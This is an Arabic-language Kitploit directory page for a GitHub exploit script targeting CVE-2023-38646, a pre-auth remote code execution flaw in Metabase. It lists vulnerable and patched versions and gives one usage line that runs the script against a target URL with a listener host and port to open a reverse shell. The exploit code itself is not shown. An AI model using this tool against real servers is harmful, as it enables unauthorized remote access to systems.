Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-38646 — تم تصميم هذا السكربت لاستغلال الإصدارات الهشّة من برنامج Metabase عبر منحك، كمهاجم، شل. | Kitploit
أدوات/GitHubGitHub/birdm4nw/cve-2023-38646
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubbirdm4nw/cve-2023-38646

CVE-2023-38646

تم تصميم هذا السكربت لاستغلال الإصدارات الهشّة من برنامج Metabase عبر منحك، كمهاجم، شل.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-38646 - Metabase RCE

تسمح نسخ Metabase مفتوحة المصدر الأقدم من 0.46.6.1 ونسخ Metabase Enterprise الأقدم من 1.46.6.1 للمهاجمين بتنفيذ أوامر تعسفية على الخادم بصلاحيات الخادم نفسه. لا تُشترط المصادقة لاستغلال الثغرة. الإصدارات الأخرى المُصحَّحة هي 0.45.4.1 و1.45.4.1 و0.44.7.1 و1.44.7.1 و0.43.7.2 و1.43.7.2.

إذا كان إصدار Metabase المستخدم معرّضًا للثغرة، فسيسمح لك هذا السكربت، بصفتك مهاجمًا، بالحصول على اتصال شل على النظام المستهدف.

الاستخدام

root@kitploit:~
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

مثال

scriptCapture

المؤلف: @birdm4nw

المرجع

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/

تنزيل الأداة